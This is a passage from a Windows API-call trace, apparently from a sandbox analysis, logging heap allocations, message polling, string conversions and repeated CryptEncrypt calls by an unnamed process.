dwFlags=0x0, lpMem=0x29f6e80 | out: hHeap=0x2af0000) returned 1 [0209.579] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0209.579] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0209.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0209.579] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.579] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0209.579] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0209.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bf8 [0209.579] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0209.579] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0209.579] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0209.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab020 [0209.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73980 [0209.579] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0209.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ba8 [0209.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bb8 [0209.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0209.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0209.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d08 [0209.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0209.580] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0209.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d78 [0209.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0209.580] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0209.580] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780c0 | out: hHeap=0x2af0000) returned 1 [0209.580] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0209.580] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0209.580] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0209.580] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0209.580] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0209.580] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0209.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0209.580] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0209.580] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0209.580] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0209.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d38 [0209.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0209.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0209.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cc8 [0209.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0209.580] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0209.580] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0209.580] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0209.580] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0209.580] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0209.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bf8 [0209.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0209.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0209.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cb8 [0209.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0209.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0209.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0209.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0209.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0209.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0209.581] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0209.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73980 | out: hHeap=0x2af0000) returned 1 [0209.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0209.581] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cb8 [0209.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0209.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0209.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0209.581] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0209.581] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cb8 [0209.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cc8 [0209.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fe0 [0209.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fe0 | out: hHeap=0x2af0000) returned 1 [0209.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0209.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0209.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec80 [0209.581] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec80 | out: hHeap=0x2af0000) returned 1 [0209.582] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c58 [0209.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0209.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0209.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c18 [0209.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0209.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d78 [0209.582] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0209.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780c0 | out: hHeap=0x2af0000) returned 1 [0209.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0209.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaf60 [0209.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0209.582] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c28 [0209.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0209.582] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0209.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0209.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0209.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0209.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0209.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0209.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0209.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0209.582] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0209.583] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0209.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0209.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0209.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0209.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0209.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0209.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0209.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0209.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0209.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0209.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0209.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0209.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0209.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0209.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0209.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0209.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0209.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0209.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0209.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0209.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0209.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0209.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0209.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0209.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0209.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab230 | out: hHeap=0x2af0000) returned 1 [0209.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1a0 | out: hHeap=0x2af0000) returned 1 [0209.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab290 | out: hHeap=0x2af0000) returned 1 [0209.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0209.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0209.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0209.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab260 | out: hHeap=0x2af0000) returned 1 [0209.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab290 | out: hHeap=0x2af0000) returned 1 [0209.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2c0 | out: hHeap=0x2af0000) returned 1 [0209.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0209.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0209.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0209.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a9db20 | out: hHeap=0x2af0000) returned 1 [0209.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0209.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2a8 | out: hHeap=0x2af0000) returned 1 [0209.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab308 | out: hHeap=0x2af0000) returned 1 [0209.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0209.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0209.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0209.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0209.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab410 | out: hHeap=0x2af0000) returned 1 [0209.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab278 | out: hHeap=0x2af0000) returned 1 [0209.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0209.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0209.585] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab248 | out: hHeap=0x2af0000) returned 1 [0209.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0209.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab308 | out: hHeap=0x2af0000) returned 1 [0209.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0209.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3f8 | out: hHeap=0x2af0000) returned 1 [0209.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0209.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab278 | out: hHeap=0x2af0000) returned 1 [0209.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0209.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1a0 | out: hHeap=0x2af0000) returned 1 [0209.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0209.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2d8 | out: hHeap=0x2af0000) returned 1 [0209.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0209.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3f8 | out: hHeap=0x2af0000) returned 1 [0209.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0209.585] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0209.585] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aab368, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0209.585] CryptEncrypt (in: hKey=0x9e2078, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x1096, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x1098) returned 1 [0209.586] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.586] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.586] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.586] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.586] CharLowerBuffW (in: lpsz="byte[4248]", cchLength=0xa | out: lpsz="byte[4248]") returned 0xa [0209.586] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.586] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.586] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0209.586] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.586] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0209.586] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.586] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.586] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.586] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0209.586] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aab248, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0209.586] CryptEncrypt (in: hKey=0x9e2078, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2a9db20*, pdwDataLen=0x8cef60*=0x1096, dwBufLen=0x1098 | out: pbData=0x2a9db20*, pdwDataLen=0x8cef60*=0x1098) returned 1 [0209.587] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.587] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.587] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.587] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.587] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.588] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.588] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.588] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0209.588] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.588] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0209.588] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.588] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.588] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0209.588] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0209.588] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0209.588] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0209.588] PeekMessageW (in: 